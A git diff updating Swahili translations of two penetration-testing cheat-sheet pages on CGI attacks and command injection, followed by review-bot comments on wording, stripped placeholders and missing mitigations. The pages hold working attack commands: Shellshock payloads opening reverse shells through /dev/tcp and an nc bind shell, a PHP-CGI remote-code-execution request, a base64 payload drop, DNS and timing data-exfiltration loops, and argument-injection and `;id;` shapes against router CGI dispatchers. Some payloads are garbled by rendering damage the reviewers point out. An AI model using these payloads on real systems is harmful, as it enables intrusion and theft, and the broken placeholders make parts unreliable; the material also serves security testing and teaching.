diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index 1ffeaa221..0e5d60364 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md 
@@ -1,20 +1,24 @@ +# CGI Pentesting + {{#include ../../banners/hacktricks-training.md}} -# Taarifa -**CGI scripts ni scripts za perl**, hivyo, ikiwa umepata udhibiti wa seva inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia shell ya perl reverse** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **badilisha kiambishi** kutoka **.pl** hadi **.cgi**, toa **idhini za kutekeleza** \(`chmod +x`\) na **fikia** shell ya reverse **kutoka kwa kivinjari cha wavuti** ili kuitekeleza. Ili kujaribu **CGI vulns** inashauriwa kutumia `nikto -C all` \(na plugins zote\) +## Maelezo -# **ShellShock** +The **CGI scripts are perl scripts**, hivyo, ikiwa ume-compromise server inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **kubadilisha extension** kutoka **.pl** hadi **.cgi**, kutoa **execute permissions** \(`chmod +x`\) na **kupata** reverse shell **kutoka kwenye web browser** ili kuitekeleza. +Ili kujaribu **CGI vulns** inashauriwa kutumia `nikto -C all` \(and all the plugins\) -**ShellShock** ni **udhaifu** unaoathiri **Bash** shell ya amri inayotumika sana katika mifumo ya uendeshaji ya Unix. Inalenga uwezo wa Bash wa kutekeleza amri zinazopitishwa na programu. Udhaifu huu uko katika udanganyifu wa **mabadiliko ya mazingira**, ambayo ni thamani zenye majina zinazobadilika ambazo zinaathiri jinsi michakato inavyofanya kazi kwenye kompyuta. Washambuliaji wanaweza kutumia hii kwa kuambatanisha **kodhi mbaya** kwenye mabadiliko ya mazingira, ambayo inatekelezwa wanapopokea mabadiliko hayo. Hii inawawezesha washambuliaji kuweza kuathiri mfumo. +## **ShellShock** -Kutatua udhaifu huu **ukurasa unaweza kutoa kosa**. +**ShellShock** ni udhaifu unaoathiri kwa kiasi kikubwa **Bash** command-line shell katika mifumo ya uendeshaji inayotegemea Unix. Unalenga uwezo wa Bash wa kuendesha amri zinazotumwa na applications. 
Udhaifu upo katika udhibiti wa **environment variables**, ambazo ni thamani zilizopewa majina zinazoendelea (dynamic) ambazo huathiri jinsi michakato inavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutumia hili kwa kuambatisha **malicious code** kwenye environment variables, ambayo itaendeshwa wakati variable inapopokelewa. Hii inawawezesha washambuliaji ku-compromise mfumo. -Unaweza **kupata** udhaifu huu kwa kugundua kwamba inatumia **toleo la zamani la Apache** na **cgi_mod** \(ikiwa na folda ya cgi\) au kutumia **nikto**. +Kutumia udhaifu huu, **ukurasa unaweza kurudisha kosa**. -## **Jaribio** +Unaweza **kupata** udhaifu huu ukiangalia kuwa unatumia **old Apache version** na **cgi_mod** \(with cgi folder\) au kwa kutumia **nikto**. -Majaribio mengi yanategemea kutuma kitu na kutarajia kwamba hiyo mistari inarudishwa katika jibu la wavuti. Ikiwa unafikiri ukurasa unaweza kuwa na udhaifu, tafuta kurasa zote za cgi na uzijaribu. +### **Jaribu** + +Vipimo vingi vinategemea ku-echo kitu na kutegemea kwamba mnyororo huo utarudishwa katika majibu ya wavuti. Ikiwa unaamini ukurasa unaweza kuwa dhaifu, tafuta kurasa zote za cgi na uziteste. **Nmap** ```bash @@ -33,7 +37,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http: ```bash python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi ``` -## Kutilia +### Exploit ```bash #Bind Shell $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8 
@@ -47,23 +51,57 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > set rhosts 10.1.2.11 > run ``` -# **Proxy \(MitM kwa Maombi ya Web server\)** +## Dispatchers za CGI zilizo katikati (routing ya endpoint moja kupitia selector parameters) -CGI inaunda variable ya mazingira kwa kila kichwa katika ombi la http. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com" +Mengi ya embedded web UIs huweka pamoja (multiplex) vitendo vingi vyenye ruhusa nyuma ya endpoint moja ya CGI (kwa mfano, `/cgi-bin/cstecgi.cgi`) na hutumia selector parameter kama `topicurl=` ku-routing ombi kwa function ya ndani. -Kama variable ya HTTP_PROXY inaweza kutumika na web server. Jaribu kutuma **kichwa** chenye: "**Proxy: <IP_attacker>:<PORT>**" na ikiwa server itafanya ombi lolote wakati wa kikao. Utaweza kukamata kila ombi lililofanywa na server. +Mbinu za ku-exploit routers hizi: -# Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) +- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, au unpack firmware na grep kwa handler strings zinazotumika na dispatcher. +- Test unauthenticated reachability: baadhi ya handlers husahau auth checks na zinaweza kupatikana moja kwa moja. +- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. -Kimsingi ikiwa cgi inafanya kazi na php ni "ya zamani" \(<5.3.12 / < 5.4.2\) unaweza kutekeleza msimbo. -Ili kutumia udhaifu huu unahitaji kufikia faili fulani la PHP la web server bila kutuma vigezo \(hasa bila kutuma herufi "="\). -Kisha, ili kujaribu udhaifu huu, unaweza kufikia kwa mfano `/index.php?-s` \(zingatia `-s`\) na **msimbo wa chanzo wa programu utaonekana katika jibu**. 
+Generic exploit shapes: +```http +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded -Kisha, ili kupata **RCE** unaweza kutuma uchunguzi huu maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **msimbo wa PHP** utakaotekelezwa katika **mwili wa ombi. Mfano:** +# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools +topicurl=¶m=-n + +# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; + +# 3) Validator bypass → arbitrary file write in file-touching handlers +topicurl=setWizardCfg&=/etc/init.d/S99rc +``` +Detection and hardening: + +- Angalia ombi zisizo za kuthibitishwa kwa centralized CGI endpoints zikiwa na `topicurl` imewekwa kwa sensitive handlers. +- Flag vigezo vinavyoanza na `-` (argv option injection attempts). +- Wauzaji: lazimisha authentication kwa state-changing handlers zote, validate kwa kutumia strict allowlists/types/lengths, na kamwe usipitishe user-controlled strings kama command-line flags. + +## PHP ya zamani + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) + +Kwa ujumla, ikiwa cgi imewezeshwa na php ni "old" \(<5.3.12 / < 5.4.2\) unaweza execute code. +Ili exploit ugani huu unahitaji kufikia faili fulani ya PHP ya web server bila kutuma parameters \(hasa bila kutuma tabia "="\). +Kisha, kwa kujaribu ugani huu, unaweza kufikia kwa mfano `/index.php?-s` \(tazama `-s`\) na **source code ya application itaonekana katika response**. + +Kisha, ili kupata **RCE** unaweza kutuma query maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **PHP code** itakayotekelezwa iko katika **body ya request**. 
+Example: ```bash curl -i --data-binary "" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" ``` -**Maelezo zaidi kuhusu vuln na uwezekano wa exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Andiko Mfano**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +**Taarifa zaidi kuhusu vuln na exploits zinazowezekana:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +## **Proxy \(MitM to Web server requests\)** + +CGI inaunda environment variable kwa kila header katika http request. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com" + +Kwa kuwa HTTP_PROXY variable inaweza kutumika na web server. Jaribu kutuma **header** inayoonyesha: "**Proxy: <IP_attacker>:<PORT>**". Ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi litakalo fanywa na server. + +## **Marejeo** + +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index a7823c01e..01943e882 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md 
@@ -2,13 +2,13 @@ {{#include ../banners/hacktricks-training.md}} -## Command Injection ni nini? +## Je, command Injection ni nini? -A **command injection** inaruhusu mshambulizi kutekeleza amri zozote za mfumo wa uendeshaji kwenye server inayohifadhi programu. Kwa hivyo, programu pamoja na data zake zote zinaweza kuathirika kabisa. Kutekelezwa kwa amri hizi kwa kawaida humruhusu mshambulizi kupata upatikanaji usioidhinishwa au kudhibiti mazingira ya programu na mfumo wa msingi. +A **command injection** inaruhusu utekelezaji wa amri zozote za mfumo wa uendeshaji na mshambuliaji kwenye seva inayoweka application. Kwa matokeo, application na data zake zote zinaweza kuathiriwa/kukomeshwa kabisa. Utekelezaji wa amri hizi kawaida humruhusu mshambuliaji kupata ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi. ### Muktadha -Kutegemea **ambapo pembejeo yako inaingizwa**, unaweza kuhitaji **kumaliza muktadha ulioko ndani ya nukuu** (kwa kutumia `"` au `'`) kabla ya kuingiza amri. +Kutegemea **mahali pembejeo zako zinaingizwa**, huenda ukahitaji **kumaliza muktadha uliomo ndani ya nukuu** (ukitumia `"` au `'`) kabla ya amri. ## Command Injection/Execution ```bash @@ -30,9 +30,9 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful > /var/www/html/out.txt #Try to redirect the output to a file < /etc/passwd #Try to send some input to the command ``` -### **Vikwazo** Bypasses +### **Kizuizi** Bypasses -Ikiwa unajaribu kutekeleza **arbitrary commands inside a linux machine** utavutiwa kusoma kuhusu haya **Bypasses:** +Ikiwa unajaribu kutekeleza **amri yoyote ndani ya mashine ya linux** utavutiwa kusoma kuhusu **Bypasses** hizi: {{#ref}} 
@@ -47,7 +47,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod ``` ### Vigezo -Hapa ni vigezo 25 vya juu ambavyo vinaweza kuwa hatarini kwa code injection na udhaifu wa RCE zinazofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)): +Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu za RCE yanayofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)): ``` ?cmd={payload} ?exec={payload} @@ -75,7 +75,7 @@ Hapa ni vigezo 25 vya juu ambavyo vinaweza kuwa hatarini kwa code injection na u ?run={payload} ?print={payload} ``` -### Time based data exfiltration +### Utoaji wa data unaotegemea wakati Kutoa data: herufi kwa herufi ``` @@ -91,7 +91,7 @@ sys 0m0.000s ``` ### DNS based data exfiltration -Inategemea zana kutoka `https://github.com/HoLyVieR/dnsbin` pia iliyohifadhiwa kwenye dnsbin.zhack.ca +Inatokana na zana kutoka `https://github.com/HoLyVieR/dnsbin` pia imehifadhiwa kwenye dnsbin.zhack.ca ``` 1. Go to http://dnsbin.zhack.ca/ 2. Execute a simple 'ls' @@ -101,12 +101,12 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) ``` -Zana mtandaoni za kuangalia DNS based data exfiltration: +Zana za mtandaoni za kuangalia kuondolewa kwa data kwa kutumia DNS: - dnsbin.zhack.ca - pingb.in -### Filtering bypass +### Kupita kando kwa vichujio #### Windows ``` 
@@ -130,9 +130,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay /* … */ }); ``` -`exec()` inazindua **shell** (`/bin/sh -c`), kwa hivyo karakteri yoyote ambayo ina maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa kwenye string. +`exec()` huanzisha **shell** (`/bin/sh -c`), kwa hivyo herufi/alama yoyote yenye maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati pembejeo ya mtumiaji inapoambatanishwa ndani ya string. -**Kupunguza hatari:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila argument kama kipengele tofauti cha array** ili shell isihusishwe: +**Kudhibiti:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusishwe: ```javascript const { execFile } = require('child_process'); execFile('/usr/bin/do-something', [ 
@@ -140,9 +140,38 @@ execFile('/usr/bin/do-something', [ '--payload', JSON.stringify(payload) ]); ``` -Kesi halisi: *Synology Photos* ≤ 1.7.0-0794 ilikuwa na udhaifu kupitia tukio la WebSocket lisilothibitishwa ambalo liliweka data iliyodhibitiwa na mshambuliaji kwenye `id_user`, ambayo baadaye iliingizwa katika wito la `exec()`, ikifanikisha RCE (Pwn2Own Ireland 2024). +Real-world case: *Synology Photos* ≤ 1.7.0-0794 ilikuwa inaweza kutumiwa kupitia tukio la WebSocket lisilotambuliwa ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye iliingizwa katika wito wa `exec()`, ikafanikisha RCE (Pwn2Own Ireland 2024). -## Orodha ya Ugunduzi ya Brute-Force +### Uingizaji wa Argument/Option kupitia hyphen ya mwanzoni (argv, no shell metacharacters) + +Si uingizaji wote unahitaji shell metacharacters. Ikiwa programu inapitisha nyimbo zisizotegemewa kama hoja kwa utility ya mfumo (hata kwa `execve`/`execFile` na bila shell), programu nyingi bado zitatafsiri hoja yoyote inaanza na `-` au `--` kama chaguo. Hii inampa mshambuliaji nafasi ya kubadili hali, kubadilisha njia za output, au kuanzisha tabia hatari bila hata kuingia kwenye shell. + +Maeneo yanayojitokeza kawaida: + +- UI za wavuti zilizojengwa/CGI handlers ambazo hujenga amri kama `ping `, `tcpdump -i -w `, `curl `, etc. +- Router za CGI zilizosimamiwa kwa pamoja (mfano, `/cgi-bin/.cgi` na parameter ya selector kama `topicurl=`) ambapo handlers nyingi zinatumia validator dhaifu ile ile. + +Nini cha kujaribu: + +- Toa thamani zinazotangulia na `-`/`--` ili zitumiwe kama flags na zana ya downstream. 
+- Tumia vibaya flags ambazo hubadilisha tabia au kuandika faili, kwa mfano: +- `ping`: `-f`/`-c 100000` kuumiza kifaa (DoS) +- `curl`: `-o /tmp/x` kuandika njia yoyote, `-K ` kuingiza config inayodhibitiwa na mshambuliaji +- `tcpdump`: `-G 1 -W 1 -z /path/script.sh` kupata utekelezwaji baada ya rotate katika wrappers zisizo salama +- Iki programu inasaidia `--` end-of-options, jaribu kuiepuka mbinu za msingi za kuzuia zinazoweka `--` mahali pasipo sahihi. + +Generic PoC shapes against centralized CGI dispatchers: +``` +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded + +# Flip options in a downstream tool via argv injection +topicurl=¶m=-n + +# Unauthenticated RCE when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; +``` +## Orodha ya Ugundaji ya Brute-Force {{#ref}} @@ -157,5 +186,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) {{#include ../banners/hacktricks-training.md}}
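Review bot: In the first hunk of `cgi.md` (`@@ -1,20 +1,24 @@`) the rewritten opening sentence now starts in English and switches to Swahili mid-sentence ("The **CGI scripts are perl scripts**, hivyo, ikiwa ume-compromise ...") and "\(and all the plugins\)" is left untranslated; suggest "Script za CGI mara nyingi ni script za Perl" and "\(na plugins zote\)". The claim that CGI scripts *are* Perl scripts is also too strong: CGI is an interface, and a `.cgi` handler can be any executable the server is permitted to run, which is exactly why upload paths must not be executable and why `chmod +x` on web content is the thing a defender restricts; "mara nyingi" (often) keeps the Perl reverse-shell example correct without overgeneralising.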
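Review bot: In the `cgi.md` hunk `@@ -47,23 +51,57 @@` several placeholders were eaten by HTML rendering: `topicurl=¶m=-n` is really `topicurl=<handler>&param=-n` where `<handler>` was dropped as a tag and the leftover `&para` was turned into `¶`, and `topicurl=setWizardCfg&=/etc/init.d/S99rc` has lost the parameter name before `=`. Use placeholders that survive markdown, e.g. `{HANDLER}` / `{PARAM}`, or escape the angle brackets. The block is fenced as ```http but carries `#` comment lines inside the request body, which is not valid HTTP; move the numbered commentary above the block or use a plain fence. The translation is incomplete in this hunk ("Focus on handlers that invoke system utilities or touch files ...", "Generic exploit shapes:" and "Detection and hardening:" stay in English), and in the PHP section "ugani" means extension, not vulnerability; the page uses "udhaifu" elsewhere, and "tabia "="" should be "herufi "="". Finally, the hardening bullets would be a natural place to state the mitigation for the Proxy section moved below them: the web server or CGI wrapper should drop an incoming `Proxy` header rather than export it as `HTTP_PROXY`, since the hunk itself explains that every request header becomes an `HTTP_*` environment variable.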
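Review bot: In the `command-injection.md` hunk `@@ -2,13 +2,13 @@` the new heading "Je, command Injection ni nini?" capitalises only "Injection" while the rest of the page writes "Command Injection", and the body sentence keeps the English article "A **command injection** inaruhusu ..."; suggest "Command Injection" in the heading and dropping the "A", and pick one of "kuathiriwa/kukomeshwa" rather than a slash pair.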
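Review bot: In the `command-injection.md` hunk `@@ -140,9 +140,38 @@` the new leading-hyphen section explains that `execFile()`/`execve` do not stop option injection but gives no mitigation, while the section directly above presents `execFile()` with an argument array as the fix, so a reader may conclude they are done. Suggest adding that the value must be validated against a strict allowlist (for `ping`, a hostname/IP pattern), that anything starting with `-` is rejected, and that `--` is placed before user-controlled positional arguments for tools that support end-of-options, which the section itself mentions. Placeholders were stripped here as well: "`ping `, `tcpdump -i -w `, `curl `", "`/cgi-bin/.cgi`", "`-K `" and "`topicurl=¶m=-n`" all lost angle-bracket placeholders, so use `{host}` style names. The sub-list "`ping`:", "`curl`:", "`tcpdump`:" is not indented under "Tumia vibaya flags ..." and will render as sibling bullets; indent it by two spaces. Typos: "Iki programu" should be "Ikiwa programu", and "nyimbo" (songs) should be "mifuatano" or simply "strings". Lastly, the PoC block duplicates the one added to `cgi.md` in this same commit (with a bare fence here versus ```http there); the repo already uses `{{#ref}}` cross-references, so link one section to the other instead of maintaining two copies that will drift.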